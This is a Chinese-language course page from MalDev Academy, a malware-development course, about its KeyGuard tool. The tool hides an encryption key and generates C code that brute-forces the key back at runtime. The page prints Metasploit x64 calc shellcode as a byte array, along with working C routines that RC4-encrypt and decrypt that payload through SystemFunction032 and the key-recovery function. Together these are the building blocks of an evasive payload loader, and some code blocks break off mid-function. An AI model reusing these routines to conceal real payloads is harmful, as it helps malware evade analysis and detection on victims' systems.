跳至主要內容

78-恶意软件开发学院工具 - KeyGuar

Maldevacademy大约 5 分钟安全开发

导言

本模块演示一个 MalDev Academy 工具,该工具生成加密密钥、对其进行加密,并输出需要在运行时暴力破解它的源代码。

使用方法

该工具只需要密钥字节大小即可。

#### KeyGuard - 由 @NUL0x4C | @mrd0x 设计的 MalDevAcademy
#### 要求输入密钥大小才能运行
### 示例

* `.\KeyGuard.exe 32` - 生成一个 32 字节的加密密钥,并包含一个在运行时对其解密的暴力破解函数

* `.\KeyGuard.exe 16` - 生成一个 16 字节的加密密钥,并包含一个在运行时对其解密的暴力破解函数
**KeyGuard 演示**

下图展示了 `KeyGuard` 用来生成 32 字节加密密钥的过程。

![图片](https://maldevacademy.s3.amazonaws.com/images/Intermediate/keyguard-116004022-69d0f001-ad32-4fd2-aec8-669c50c3d93d.png)

下面展示了完整的输出。

```c
/*

[i] 输入密钥大小:32
[+] 使用 “0x88” 作为提示字节

[+] 使用以下密钥进行 [加密]
unsigned char OriginalKey[] = {
        0x88, 0xAE, 0x23, 0xCD, 0x24, 0xD0, 0xA5, 0xC9, 0xE7, 0x9C, 0x3C, 0x53, 0x9B, 0xCE, 0x01, 0x30,
        0xBC, 0x7A, 0x0A, 0x2F, 0xB3, 0xFE, 0x8E, 0xBA, 0x0F, 0x34, 0x49, 0xAB, 0x12, 0xEC, 0x22, 0x61 };

[+] 在 [实现] 中使用以下密钥
unsigned char ProtectedKey[] = {
        0xD1, 0xF6, 0x7C, 0x89, 0x71, 0x8C, 0xF2, 0x89, 0xB6, 0xFC, 0x1F, 0x07, 0xFE, 0x82, 0x56, 0x66,
        0x95, 0xD2, 0x45, 0x1B, 0x9E, 0x4A, 0xFD, 0x88, 0x7E, 0x14, 0x3A, 0x9F, 0x77, 0x50, 0x19, 0xD9 };

                        -------------------------------------------------

*/

#include <Windows.h>

#define 提示字节 0x88

unsigned char ProtectedKey[] = {
        0xD1, 0xF6, 0x7C, 0x89, 0x71, 0x8C, 0xF2, 0x89, 0xB6, 0xFC, 0x1F, 0x07, 0xFE, 0x82, 0x56, 0x66,
        0x95, 0xD2, 0x45, 0x1B, 0x9E, 0x4A, 0xFD, 0x88, 0x7E, 0x14, 0x3A, 0x9F, 0x77, 0x50, 0x19, 0xD9 };

BYTE 暴力破解解密(BYTE 提示字节, IN PBYTE pProtectedKey, IN SIZE_T sKey, OUT PBYTE* ppRealKey) {

        BYTE            b                       = 0;
        INT             i                       = 0;
        PBYTE           pRealKey                = (PBYTE)malloc(sKey);

        if (!pRealKey)
            return NULL;

        while (1){

                if (((pProtectedKey[0] ^ b)) == 提示字节)
                     break;
                else
                     b++;

        }

        for (int i = 0; i < sKey; i++){
                pRealKey[i] = (BYTE)((pProtectedKey[i] ^ b) - i);
        }

        *ppRealKey = pRealKey;
        return b;
}

// 示例调用:

// PBYTE        pRealKey        =       NULL;
// BruteForceDecryption(提示字节, ProtectedKey, sizeof(ProtectedKey), &pRealKey);

示例 - RC4 加密

要加密有效负载,使用的明文密钥是那个密钥。基于上述显示的输出,明文密钥如下:

unsigned char OriginalKey[] = {
        0x88, 0xAE, 0x23, 0xCD, 0x24, 0xD0, 0xA5, 0xC9, 0xE7, 0x9C, 0x3C, 0x53, 0x9B, 0xCE, 0x01, 0x30,
        0xBC, 0x7A, 0x0A, 0x2F, 0xB3, 0xFE, 0x8E, 0xBA, 0x0F, 0x34, 0x49, 0xAB, 0x12, 0xEC, 0x22, 0x61 };

这是用于加密有效负载的密钥。加密过程将使用 Rc4EncryptionViSystemFunc032 函数使用密钥对 Msfvenom x64 calc shellcode 进行加密。从 有效负载加密 - RC4 模块中调用此过程。

#include <Windows.h>
#include <stdio.h>


// x64 calc metasploit(要加密)
unsigned char Payload[] = {
	0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51,
	0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52,
	0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72,
	0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
	0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41,
	0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B,
	0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
	0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,
	0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41,
	0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
	0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1,
	0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,
	0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44,
	0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01,
	0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59,
	0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,
	0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48,
	0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D,
	0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5,
	0xBB, 0xE0, 0x1D, 0x2A, 0x0A, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,
	0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0,
	0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89,
	0xDA, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x00
};


// 以下代码来自(RC4 有效负载加密 - 基本模块)

// 这就是 SystemFunction032 函数作为参数所需声明的内容
typedef struct 
{
	DWORD Length;
	DWORD MaximumLength;
	PVOID Buffer;

} USTRING;


// 定义函数的外观 - 有关此结构在 api 哈希部分的更多信息
typedef NTSTATUS(NTAPI* fnSystemFunction032)(
	struct USTRING* Data, 
	struct USTRING* Key
	);


BOOL Rc4EncryptionViSystemFunc032(IN PBYTE pRc4Key, IN PBYTE pPayloadData, IN DWORD
### 示例 - RC4 解密

下面的代码将使用暴力破解方法解密 RC4 加密的负载。密钥是使用 KeyGuard 工具加密的。

```c
#include <Windows.h>
#include <stdio.h>

// 加密的 x64 计算器 Metasploit Shellcode
unsigned char Rc4EncryptedPayload[] = {
        0x44, 0x3C, 0x18, 0x73, 0xCA, 0x86, 0x68, 0x08, 0xBC, 0xCD, 0x2D, 0x59, 0x39, 0x22, 0x3C, 0xFF,
        0x6A, 0x87, 0xA0, 0xF9, 0x69, 0xB4, 0x49, 0x95, 0x3A, 0xF7, 0x79, 0x24, 0x57, 0x7D, 0xC6, 0x31,
        0xD1, 0xB4, 0x68, 0xC7, 0x5D, 0x88, 0xFF, 0x90, 0x2C, 0x1A, 0xB3, 0xB3, 0xB3, 0xD5, 0x8E, 0xD0,
        0x31, 0x8C, 0x11, 0x1E, 0x51, 0x12, 0xC6, 0x32, 0x27, 0x8F, 0x34, 0x56, 0x49, 0x15, 0xBE, 0xE9,
        0xDB, 0xA9, 0xD7, 0x44, 0x66, 0x87, 0x79, 0x07, 0x94, 0x04, 0xB0, 0x74, 0x96, 0x4A, 0x09, 0x3B,
        0xAA, 0xBF, 0xEE, 0x0D, 0xEC, 0x2D, 0x6B, 0xD9, 0x01, 0xCE, 0xBE, 0x4D, 0xA9, 0x3C, 0x78, 0x93,
        0x62, 0xFE, 0x5E, 0x69, 0x47, 0x54, 0xAE, 0xD1, 0x0F, 0xC3, 0xAF, 0xA6, 0xE8, 0xF2, 0xFA, 0x02,
        0x08, 0xD8, 0xDA, 0x42, 0xD7, 0x62, 0x31, 0xC8, 0x1E, 0x5E, 0x11, 0x2A, 0xB0, 0x82, 0xB5, 0x0B,
        0x15, 0xC3, 0x36, 0xD2, 0x36, 0xA8, 0x1B, 0x88, 0x2C, 0x3F, 0x4D, 0xDE, 0x5F, 0x19, 0x17, 0xF6,
        0xE8, 0x30, 0x16, 0x6C, 0x64, 0x7B, 0x5E, 0xD4, 0x45, 0x93, 0x76, 0x47, 0x86, 0xE2, 0x19, 0xEA,
        0x62, 0x64, 0x17, 0xBE, 0x0A, 0x0D, 0x66, 0xF9, 0x3A, 0xB7, 0xD0, 0xFD, 0xE4, 0x90, 0xA5, 0xB1,
        0x04, 0xAD, 0x6E, 0x9E, 0xA6, 0x81, 0xFC, 0xBA, 0x08, 0x30, 0x56, 0x86, 0x34, 0xC3, 0xE6, 0x2D,
        0xA3, 0x90, 0x93, 0x13, 0xD7, 0xD3, 0x7D, 0x0C, 0xCB, 0x6F, 0xA4, 0xE0, 0xAA, 0x19, 0x77, 0x4F,
        0xB6, 0x2A, 0xEA, 0xA0, 0xDD, 0x0C, 0x57, 0x1F, 0x93, 0x08, 0x0D, 0x1B, 0x29, 0x79, 0x62, 0x00,
        0xCC, 0xE3, 0x6B, 0xF2, 0xD6, 0x71, 0xC6, 0x80, 0x0A, 0x4B, 0x68, 0xD1, 0xBA, 0xDC, 0x86, 0x8D,
        0x3C, 0x6E, 0xAA, 0xAC, 0xBE, 0x3E, 0x66, 0xD9, 0x2E, 0x94, 0x8C, 0x71, 0x00, 0x94, 0x13, 0xE2,
        0xCC, 0xDF, 0x98, 0x32, 0xD7, 0x9D, 0x5B, 0xAD, 0xFB, 0x21, 0x6A, 0xF4, 0x88, 0x16, 0x0B, 0xEF };


// 以下代码来自 (RC4 负载加密 - 基本模块)

// 这是 SystemFunction032 函数作为参数的东西
typedef struct
{
	DWORD	Length;
	DWORD	MaximumLength;
	PVOID	Buffer;

} USTRING;


// 定义函数的外观 - 在 API 哈希部分中更多地讨论此结构
typedef NTSTATUS(NTAPI* fnSystemFunction032)(
	struct USTRING* Data,
	struct USTRING* Key
	);


BOOL Rc4EncryptionViSystemFunc032(IN PBYTE pRc4Key, IN PBYTE pPayloadData, IN DWORD dwRc4KeySize, IN DWORD sPayloadSize) {

	// SystemFunction032 的返回值
	NTSTATUS	STATUS = NULL;

	// 制作 2 个 USTRING 变量,一个作为密钥传递,另一个作为要加密/解密的数据块传递
	USTRING		Key  = { .Buffer = pRc4Key, 		.Length = dwRc4KeySize,		.MaximumLength = dwRc4KeySize },
		        Data = { .Buffer = pPayloadData, 	.Length = sPayloadSize,		.MaximumLength = sPayloadSize };


	// 由于 SystemFunction032 是从 Advapi32.dll 导出的,我们使用 LoadLibraryA 将 Advapi32.dll 加载到过程中,
	// 并使用其返回值作为 GetProcAddress 中的 hModule 参数
	fnSystemFunction032 SystemFunction032 = (fnSystemFunction032)GetProcAddress(LoadLibraryA("Advapi32"), "SystemFunction032");

	// 如果 SystemFunction032 调用失败,它将返回非零值
	if ((STATUS = SystemFunction032(&Data, &Key)) != 0x0) {
		printf("[!] SystemFunction032 失败,错误:0x%0.8X \n", STATUS);
		return FALSE
### 结果

已使用加密密钥检索原始 shellcode 字节,演示了 KeyGuard 工具的使用和优势。

![image](https://maldevacademy.s3.amazonaws.com/images/Intermediate/keyguard-316007780-4cc95a19-5f8c-48db-99e6-defa90b83820.png)
默认页脚
Copyright © 2024 Maldevacademy